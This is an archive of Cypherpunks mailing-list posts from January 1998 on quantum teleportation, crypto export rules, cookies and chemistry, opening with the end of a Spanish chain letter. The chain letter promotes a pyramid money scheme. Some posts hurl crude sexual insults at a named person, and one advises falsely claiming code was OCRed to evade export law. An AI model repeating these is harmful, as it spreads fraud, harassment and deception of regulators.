esta hermosa oportunidad de hacer toneladas de dinero con el Internet.

**Dicho sea de paso, si Ud. defrauda a las personas poniendo 
mensajescon su nombre y no enva ningn dinero a los dems en 
esa lista, Ud. recibir casi NADA!.

He conversado con personas que conocieron personas que hicieron 
eso y solo llegaron a colectar unos $150.00, y eso despus de unas 
7 semanas!.

Algunos decidieron probar otra vez, haciendo correctamente, y en 
4 a 5 semanas recibieron ms de $10.000. Esto es la ms limpia y 
honesta manera de compartir fortuna que yo jams haya visto, 
sin costarnos mucho excepto un poco de tiempo. El TIEMPO ES 
IMPORTANTE!, no dejar pasar ms de 7 das del momento que vea 
este artculo!. Tambin puede conseguir lista de E-MAIL para 
obtener dinero extra.
Sigamos todos las reglas del negocio!

Recuerde mencionar estas ganancias extras en sus declaraciones 
de impuestos. 

Gracias otra vez y BENDICIONES A TODOS!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 28 Jan 1998 12:38:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356(fwd)
In-Reply-To: <199801272132.PAA01922@einstein.ssz.com>
Message-ID: <v03102808b0f464c70ff9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:56 PM -0800 1/27/98, Steve Schear wrote:

>I wonder how far off use of this technique for interplanetary rovers might
>be (10 years, 20 years)?  Remote (Earth) rover manipulation is tedious at
>best due to several minutes (or an hour or more to the outer planets) of
>propagation delay.  Autonomous rovers need enough smarts built-in to handle
>unexpected situations, a non-trivial problem.  An alternative is to
>establish a link using entangled photons. If a simple approach to saving
>these entangled states during signal transit, in both directions, were
>found instantaneous communication and simplified remote control would be a
>reality.

Nothing in quantum teleportation has been shown to propagate signals faster
than light. (If you don't believe me, look into it. Start by reading the
FTL discussions about Bell's Theorem.)

I personally doubt that any flat spacetime topology (e.g., wormholes
excepted) will admit any FTL signals. A lot of things would dramatically
change if FTL communication existed...not the practical "communication"
issues, which are human social minutiae, but issues about synchronization
of reference frames and causality violations.

>
>Of course one needn't stop there.  If entangled states could be stored for
>several years, instantaneous communication with neighbooring stars is a
>real possibility.  Coupled with advances in mind-machine science it might
>someday be possible to explore, first-hand, our local portion of the galaxy
>without leaving earth, or upload/download one's consciouness to vessels in
>remote locations.

Who's your supplier?

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 28 Jan 1998 12:40:58 +0800
To: cypherpunks@toad.com
Subject: Re: Kooks and their Kookies
In-Reply-To: <199801280030.SAA20118@manifold.algebra.com>
Message-ID: <w3uZJe12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



ichudov@Algebra.COM (Igor Chudov @ home) writes:

> I have just looked into my cookies file, and noticed an interesting
> kookie (pun intended):
>
> www.netscum.net FALSE   /       FALSE   123456789      visited the%20Home%20P
>
> (Name Deleted is the name of one of the well known USENET personaes,
> and there is a number instead of 123456789).
>
> This is really interesting. If netscum.net ever comes up again, do not
> view it except through the anonymizer or the crowds, and filter out the
> kooks' kookies.

You can find *most* of netscum at this URL:

http://www.spambusters.dyn.ml.org/www.netscum.net/index.html

It does do very interesting things with cookies. it also allows you to
customize the typeface, the size, and the color of the text using the
cookie. Be sure at least to watch the cookies coming in on this and any
other site.

Would there be any interest if I put an anootated netscape cookie file
(cypherpunks cookie potluck) someplace like geocitie.com?

Also a composite blockfile for junkbusters and other filtering proxies.

A really neat feature for ad-filtering proxies would be to be able to
place a specified picture (or at least a black rectangle) over a jpg or
gif file being received from a URL that matches a specified pattern.
I'm not sufficiently handy with graphics file formats to tell how easy
this would be.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 28 Jan 1998 11:15:25 +0800
To: cypherpunks@Algebra.COM
Subject: Interesting Chemical Reaction
Message-ID: <199801280310.VAA21421@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



An interesting experiment is to mix the ordinary ammonium nitrate
(a fertilizer) with room temp. water. Try to put in as much ammonium
nitrate as it is possible to dissolve.

You will see the temperature of the mixture DROP to below the freezing
point (for pure water that is).

Wow. I did that 12 years ago and was amazed. A really easy way to get
cold water if no freezer is available.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 28 Jan 1998 12:29:38 +0800
To: cypherpunks@toad.com
Subject: Re: Latest Clinton dodge?
In-Reply-To: <199801271757.LAA14080@frodo.tucc.uab.edu>
Message-ID: <8yVZJe14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



John Blair <jdblair@frodo.tucc.uab.edu> writes:

> >> It figures that Dimitri would know this. He seems to know all
> >> about Tim's and Sameer's and John Gilmore's penises too. Must be
> >> all that extensive taste-testing...
> >>
> >>  - Frondeur
>
> > Bobbi Inman is a cocksucker.
>
> Ahh... I remember now why I re-subscribed to Cypherpunks.  It was for
> all of the intelligent discussion that goes on here.  At least back
> in the days of Detweiler the character assassination was creative and
> often fun to read.
>
> Can you please keep childish shots like this in private e-mail?  It
> has no place in this mailing list.

Bobbi Inman takes it up the ass too.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Wed, 28 Jan 1998 15:46:03 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356(fwd)
In-Reply-To: <199801280442.WAA04344@einstein.ssz.com>
Message-ID: <v03102801b0f46f8a5662@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:42 PM -0600 1/27/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Tue, 27 Jan 1998 20:34:48 -0800
>> From: Tim May <tcmay@got.net>
>> Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356
>>  (fwd)
>
>> Nothing in quantum teleportation has been shown to propagate signals faster
>> than light. (If you don't believe me, look into it. Start by reading the
>> FTL discussions about Bell's Theorem.)
>
>The actual transportation of the state is instantanious as it must be by
>quantum theory, just as the change in orbits of an electron occurs instantly.
>However, the catch is that the command/synchronization channel must be
>sent in parallel and it at some point can't use the quantum transportation
>technique and hence the speed-of-light comes back into play. This was
>specificaly discussed in the original quantum transportation announcement
>sent out by AIP.

I don't understand why a command/synch channel is required.  Why aren't the
coding techniques commonly used in telecom and disk data encoding adequate
to both synchonize and convey data?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Wed, 28 Jan 1998 13:23:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: sat survailience
Message-ID: <3.0.32.19980127210104.006c5f24@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:06 PM 1/27/98 -0500, Robert Hettinga wrote:
>
>
>--- begin forwarded text
>
>
>Date: Tue, 27 Jan 1998 14:55:09 -0500
>From: Somebody
>Subject: sat survailience
>To: rah <rah@shipwright.com>
>MIME-version: 1.0
>
>Bob - something else to be paranoid about!
><somebody's .sig>
><snip>
>
>When Is a Satellite Photo An Unreasonable Search?
>
>By <some reporter>

IMPORTANT INFORMATION RESTORED AFTER INEXPLICABLE DELETION:

>Staff Reporter of  WALL STREET JOURNAL>

... ETC ...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Wed, 28 Jan 1998 13:51:42 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: ULotD? Cuban Tattoos.
In-Reply-To: <v04003905b0f40ca8fb98@[139.167.130.248]>
Message-ID: <3.0.5.32.19980127214312.03fd8160@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 05:14 PM 1/27/98 -0500, Robert Hettinga wrote:

>From: "Perry E. Metzger" <perry@piermont.com>
>
>
>The story posted is an urban legend.
>
>It is NOT an urban legend that someone has been tattooed with "RSA in
>Perl". A picture of Richard White's tattoo is at:
>
>http:/www.dcs.ex.ac.uk/~aba/rsa/tattoo.html

It is also true that he had a typo in the tattoo.  It seems someone, who
will remain unnamed, joked about "what if it has a typo, is it still a
violation of ITAR?".  Seems they decided to proof read it.  "Doh!"
 
---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Wed, 28 Jan 1998 13:52:34 +0800
To: Tom Weinstein <tomw@netscape.com>
Subject: Re: Netscape 5 will be GPL'ed
In-Reply-To: <E0xvVff-0003c1-00@heaton.cl.cam.ac.uk>
Message-ID: <3.0.5.32.19980127214433.03fe71b0@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 07:26 PM 1/26/98 -0800, Tom Weinstein wrote:

>Don't hold your breath.  We're still bound by US export regulations, so
>we won't be able to export crypto-relevant source code.  We'll release what
>we can, but you probably won't be satisfied.
>
>Of course, there's always the option for some enterprising individuals
>outside the US to replace the missing pieces.

Or you could just publish the source code in a big book...  ]:>

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 28 Jan 1998 05:12:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Latest Clinton dodge?
Message-ID: <199801272107.WAA06053@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




> 
> Next thing you know, he'll say "She gave me a blow job, but didn't
> swallow, so it's not sex." :)


Is that like "if you don't get pregnant," it's not intercourse???

Gotta be a lot of virgins out there then.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 28 Jan 1998 12:18:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Interesting Chemical Reaction
In-Reply-To: <199801280310.VAA21421@manifold.algebra.com>
Message-ID: <199801280413.WAA08034@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Igor writes:

> An interesting experiment is to mix the ordinary ammonium nitrate
> (a fertilizer) with room temp. water. Try to put in as much ammonium
> nitrate as it is possible to dissolve.

> You will see the temperature of the mixture DROP to below the freezing
> point (for pure water that is).

> Wow. I did that 12 years ago and was amazed. A really easy way to get
> cold water if no freezer is available.

And for those who may think that endothermic reactions violate some basic
law about entropy always increasing, I should point out that the increase
in entropy from the uniform mixing of two different materials can more
than compensate for the decrease in temperature.  Ain't science wonderful? 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 12:18:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
Message-ID: <199801280418.WAA04044@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Steve,

Can I forward your questions to another technology list I support as well as
the local high performance rocketry group I'm involved in? I believe
they would be intriqued by your questions.

Forwarded message:

> Date: Tue, 27 Jan 1998 19:56:33 -0800
> From: Steve Schear <schear@lvdi.net>
> Subject: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
> 
> >ANOTHER VERSION OF QUANTUM TELEPORTATION is

[text deleted]

> I wonder how far off use of this technique for interplanetary rovers might
> be (10 years, 20 years)?  Remote (Earth) rover manipulation is tedious at
> best due to several minutes (or an hour or more to the outer planets) of
> propagation delay.

As I understand the process you don't get around the speed-of-light issue
because the control channel still needs to be sent via radio or laser or
whatever. This was discussed in the in the original teleportation
announcement. However, I don't see anything that would keep you from syncing
two atomic clocks and then using them to make the changes in sync, this
should allow the imposition of the speed of light only on initiation and
occassion syncronization. I'll have to beg ignorance on specifics as I
haven't had the time to really dig into specifics. I haven't even read the
primary references to date.

> Autonomous rovers need enough smarts built-in to handle
> unexpected situations, a non-trivial problem.  An alternative is to
> establish a link using entangled photons. If a simple approach to saving
> these entangled states during signal transit, in both directions, were
> found instantaneous communication and simplified remote control would be a
> reality.

Agreed. It would also solve many terrestrial problems as well.

> Of course one needn't stop there.  If entangled states could be stored for
> several years, instantaneous communication with neighbooring stars is a
> real possibility.  Coupled with advances in mind-machine science it might
> someday be possible to explore, first-hand, our local portion of the galaxy
> without leaving earth, or upload/download one's consciouness to vessels in
> remote locations.

True, but it would be boring compared to being there first person. I do
support robot exploration as a precursor to manned exploration.

> Speaking of which, do the current SETI programs check for signal modulation
> using polarization.

>From what little I have delved into this, most signals coming in from 'out
there' as well as from satellites are circularly polarized. This is the
reason that the antennas have those curly-ques on them (look like a
cork-screw sorta). The last time I even messed with extra-terrestrial
signals was the SL-9 impacts. I worked with several amateur groups using plane
(flat rectangular) loop antennas to measure the increase in the background
noise in various bands (we used a HP spectrum analyzer at my site) during
the impacts. What we saw was a 'jump' across the band of several db's just
at the time-of-flight times we expected. The assumption being this was
caused by the impacts. We monitored 1MHz to 10MHz. I found it pretty
impressive. We got, if memory serves, around 6 of the large impacts.

>  If we've discovered this trick, sure so have other
> intelligent life forms.  Most natural sources of radiation tend to
> unpolarized, so a rapidly flucuating polar modularion might easily appear
> to be noise.

I'll have to disagree, all forms of E-M radiation that I am aware of are
polarized to some frame of reference. The E-M fields after all are
orthogonal. The question is which field you want to pick as a reference
and the relationship of source to sensor. Circularly polarized (ie the
fields rotate around the axis of transmission at some rate) are about the
only sort that would appear essentialy the same irrespective of reference
frame.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Wed, 28 Jan 1998 11:19:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: State of the Union Address
Message-ID: <8463c019601705d91ebc98ca08ee4e29@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



>I guess those high school students aren't the only ones with no clear
>idea of the way the world works.  While salt water does not ordinarily
>explode, in this case salt water is the ultimate product -- but massive
>heat released when acids and bases join and recombine to produce salts
>(in this case table salt) and water.

Interesting thread. While we're on the topic of chemistry and heat:

Does anyone happen to know how to figure the energy requirements or yields
for a reaction? My college chemistry book doesn't say a whole lot about it.
In fact it doesn't say enough to actually be useful at all; it gives
energies for four or five different bonds in a table and then launches into
a really bad explanation of how to calculate this. 

If I have to use a table of bond energies is there one available online? Or
is there a simpler way to just calculate the bloody things?

I really ought to take more chemistry courses before I get my diploma. Or at
the very least audit them.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 28 Jan 1998 12:53:54 +0800
To: emc@wire.insync.net (Eric Cordian)
Subject: Re: Interesting Chemical Reaction
In-Reply-To: <199801280413.WAA08034@wire.insync.net>
Message-ID: <199801280432.WAA22267@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Eric Cordian wrote:
> Igor writes:
> > An interesting experiment is to mix the ordinary ammonium nitrate
> > (a fertilizer) with room temp. water. Try to put in as much ammonium
> > nitrate as it is possible to dissolve.
> > You will see the temperature of the mixture DROP to below the freezing
> > point (for pure water that is).
> > Wow. I did that 12 years ago and was amazed. A really easy way to get
> > cold water if no freezer is available.
> 
> And for those who may think that endothermic reactions violate some basic
> law about entropy always increasing, I should point out that the increase
> in entropy from the uniform mixing of two different materials can more
> than compensate for the decrease in temperature.  Ain't science wonderful? 

I did understand the above, but thanks anyway Eric. What I still do not
understand though is what happens between the water and ammonium nitrate
that consumes so much energy. 

I mean, okay, you need to spend energy to mix these two things. Then,
logically, they should not "want" to mix, right? But empirically,
ammonuim nitrate literally sucks water vapors from the air. How come?

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 12:44:17 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
Message-ID: <199801280442.WAA04344@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 27 Jan 1998 20:34:48 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356
>  (fwd)

> Nothing in quantum teleportation has been shown to propagate signals faster
> than light. (If you don't believe me, look into it. Start by reading the
> FTL discussions about Bell's Theorem.)

The actual transportation of the state is instantanious as it must be by
quantum theory, just as the change in orbits of an electron occurs instantly.
However, the catch is that the command/synchronization channel must be
sent in parallel and it at some point can't use the quantum transportation
technique and hence the speed-of-light comes back into play. This was
specificaly discussed in the original quantum transportation announcement
sent out by AIP.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 28 Jan 1998 12:48:03 +0800
To: John Blair <jdblair@frodo.tucc.uab.edu>
Subject: Re: Latest Clinton dodge?
In-Reply-To: <199801271757.LAA14080@frodo.tucc.uab.edu>
Message-ID: <Pine.SOL.3.96.980127223819.29303B-100000@cavern.uark.edu>
MIME-Version: 1.0
Content-Type: text/plain



Now I remember why i resubscribed to punks.  It was so I 
could laugh at the guys who deplore the irrelevant irreverence
that makes you whackos' messages worth a diddly to begin with.
MacN
On Tue, 27 Jan 1998, John Blair wrote:
> 
> Ahh... I remember now why I re-subscribed to Cypherpunks.  It was for 
> all of the intelligent discussion that goes on here.  At least back 
> in the days of Detweiler the character assassination was creative and 
> often fun to read.
> 
> Can you please keep childish shots like this in private e-mail?  It 
> has no place in this mailing list.
> 
>  -john.
> 
> 
> 
> ......................................................................
> .                                                                    .
> .....John.D.Blair...   mailto:jdblair@uab.edu   phoneto:205.975.7123 .
>                    .   http://frodo.tucc.uab.edu  faxto:205.975.7129 .
>  ..sys|net.admin....                                                 .
>  .                     the university computer center            .....
>  ..... g.e.e.k.n.i.k...the.university.of.alabama.at.birmingham....
> 
> 
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3a
> Charset: noconv
> 
> iQCVAwUBNM4gCgJjTpK3AXhBAQHC/QQArCwnCHSCzgmUGjGkGtAEtkwnsiq8rbF8
> a8Ov/LKuFJslK8osLKawD+38nnY9Y3K4kvgnIT2EPRRrEzu2MxO7CKb2J/ly4QVZ
> xPbQ357GlmnCWmHvgECY7A20iPjgAO/z+8t9OEkCPv47E6C9+yzPdUXtWZ6Uwp4h
> uy/7Dm5eCkA=
> =nH/J
> -----END PGP SIGNATURE-----
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 28 Jan 1998 14:47:53 +0800
To: cypherpunks@cyberpass.net
Subject: Exporting Code the Easy Way
In-Reply-To: <34CD53FD.363A9C8C@netscape.com>
Message-ID: <v03102809b0f4820cf059@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:44 PM -0800 1/27/98, Alan Olsen wrote:
>At 07:26 PM 1/26/98 -0800, Tom Weinstein wrote:
>
>>Don't hold your breath.  We're still bound by US export regulations, so
>>we won't be able to export crypto-relevant source code.  We'll release what
>>we can, but you probably won't be satisfied.
>>
>>Of course, there's always the option for some enterprising individuals
>>outside the US to replace the missing pieces.
>
>Or you could just publish the source code in a big book...  ]:>

Or even easier option:

Dispense with the actual scanning and OCRing and simply _say_ the code was
OCRed. Or, for that matter, don't even bother to say. U.S. Customs and the
ITARs/EARs have no provisions for asking international users if the version
they are using was compiled from source code printed in books!

(This was my recommended approach for the PGP job...use the code off the
CD-ROM, carried out in someone's luggage or mailed or sent over the Net,
and then _say_ the OCRing was done....it's not as if U.S. Customs has any
authority to question someone in Amsterdam or Denmark and demand proof that
they really spent those hundreds of hours laboriously scanning and OCRing
and proofreading....)

Why do things the hard way?

Seriously, when the code people use internationally is used, just who the
hell cares whether it was ever scanned from a book or not? That only
affects the issue of _export_, which is mooted anyway by the utter
triviality of exporting software on CD-ROMs, DATs, through the mail, via
FedEx and Airborne, through remailers, and on and on and on. Nobodu using
"PGP International Version" has to worry one whit, no pun intended, about
whether the code came from an original PGP distribution, or source code
scanned and OCRed, so long as it checks out properly.


--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 28 Jan 1998 13:01:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
In-Reply-To: <v03102800b0f45774adc0@[208.129.55.202]>
Message-ID: <199801280458.WAA08097@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Steve Shear postulates:

> Of course one needn't stop there.  If entangled states could be stored
> for several years, instantaneous communication with neighbooring stars
> is a real possibility.

And in whose local Lorentz frame would such communication be
"instantaneous"?

> Coupled with advances in mind-machine science it
> might someday be possible to explore, first-hand, our local portion of
> the galaxy without leaving earth, or upload/download one's consciouness
> to vessels in remote locations. 

Uh, no.  The operators for corresponding observables at both ends of such
an experiment commute, so it is not possible to transmit information
non-locally using such an apparatus. 

This was discovered when the first experiments to verify the
Einstein-Rosen-Podolsky effect were done.  You need the results of
measurements on the opposite end to decrypt the information at the end you
are at. 

The Dancing Wu-Li Masters are closed for business. 

--
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 13:00:35 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: update.350 (fwd)
Message-ID: <199801280500.XAA04568@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From physnews@aip.org Wed Dec 10 16:59:59 1997
Date: Wed, 10 Dec 97 14:35:44 EST
From: physnews@aip.org (AIP listserver)
Message-Id: <9712101935.AA25024@aip.org>
To: physnews-mailing@aip.org
Subject: update.350

PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 350 December 10, 1997   by Phillip F. Schewe and Ben
Stein

QUANTUM TELEPORTATION has been experimentally
demonstrated by physicists at the University of Innsbruck (Anton
Zeilinger, 011-43-676-305-8608, anton.zeilinger@ uibk.ac.at; Dik
Bouwmeester, Dik.Bouwmeester@uibk.ac.at).  First proposed in
1993 by Charles Bennett of IBM (914-945-3118), quantum
teleportation allow physicists to take a photon (or any other
quantum-scale particle, such as an atom), and transfer its properties
(such as its polarization) to another photon--even if the two photons
are on opposite sides of the galaxy.  Note that this scheme
transports the particle's properties to the remote location and not the
particle itself. And as with Star Trek's Captain Kirk, whose body
is destroyed at the teleporter and reconstructed at his destination,
the state of the original photon must be destroyed to create an exact
reconstruction at the other end.  In the Innsbruck experiment, the
researchers create a pair of photons A and B that are quantum
mechanically "entangled": the polarization of each photon is in a
fuzzy, undetermined state, yet the two photons have a precisely
defined interrelationship.  If one photon is later measured to have,
say, a horizontal polarization, then the other photon must "collapse"
into the complementary state of vertical polarization.  In the
experiment, one of the entangled photons A arrives at an optical
device at the exact time as a "message" photon M whose
polarization state is to be teleported.  These two photons enter a
device where they become indistinguishable, thus effacing our
knowledge of M's polarization (the equivalent of destroying
Kirk).What the researchers have verified is that by ensuring that
M's polarization is complementary to A's, then B's polarization
would now have to assume the same value as M's. In other words,
although M and B have never been in contact, B has been imprinted
with M's polarization value, across the whole galaxy,
instantaneously. This does not mean that faster-than-light
information transfer has occurred. The people at the sending station
must still convey the fact that teleportation had been successful by
making a phone call or using some other light-speed or
sub-light-speed means of communication. While physicists don't
foresee the possibility of teleporting large-scale objects like humans,
this scheme will have uses in quantum computing and cryptography. 
(D. Bouwmeester et al., Nature, 11 Dec 1997; see also
www.aip.org/physnews/graphics) 

DO EARTHQUAKES HAVE ELECTRICAL PRECURSORS? The
elastic waves measured by seismometers are transmitted by the
flexing crust while an earthquake is doing its worst.  But some
scientists believe that flexing also goes on in the hours and even
weeks before a quake.  Too small to be detected seismically, the
flexing might well be sensed electrically.  As underground strata
rearrange themselves before a quake, the thinking goes, pockets of
water are squeezed into new configurations, changing local
conduction properties, which can be monitored with buried
electrodes. On this basis Panayiotis Varotsos at the University of
Athens (011-30-1-894-9849, pvaro@leon.nrcps.ariadne-t.gr), has
reportedly predicted certain quakes in Greece weeks ahead of time
by triangulating voltage differentials at the level of 10 millivolts/km
over distances of 100 km. (Some skeptics dispute this assertion.) 
In new research, Varotsos buttresses his claims with laboratory
studies of another system under pressure which puts out transient
electrical signals before it fractures, namely a crystal containing a
variety of dislocations and defects. Conductivity patterns in the
crystal convince Varotsos that analogous patterns (although on a
much bigger distance scale) observed in the buried electrode arrays
constitute a true earthquake precursor.  (Varotsos et al., Journal of
Applied Physics, 1 Jan, 1998; journalists can obtain the paper from
physnews@aip.org.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 13:05:20 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
Message-ID: <199801280504.XAA04662@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Cordian <emc@wire.insync.net>
> Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
> Date: Tue, 27 Jan 1998 22:58:28 -0600 (CST)

> > Of course one needn't stop there.  If entangled states could be stored
> > for several years, instantaneous communication with neighbooring stars
> > is a real possibility.
> 
> And in whose local Lorentz frame would such communication be
> "instantaneous"?

Actualy, if we are talking about instantanious events the event itself is not
frame relevant, thought exactly when and where the event occurred may be.
Consider an electron when it changes orbitals does so in zero time. So the
question that the photon was emitted is not at issue, now where that photon
came from and at what clock tick may in fact be.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 13:17:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Clinton for Nobel Peace Prize [CNN]
Message-ID: <199801280515.XAA04830@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Clinton Nominated For Nobel Peace Prize
> 
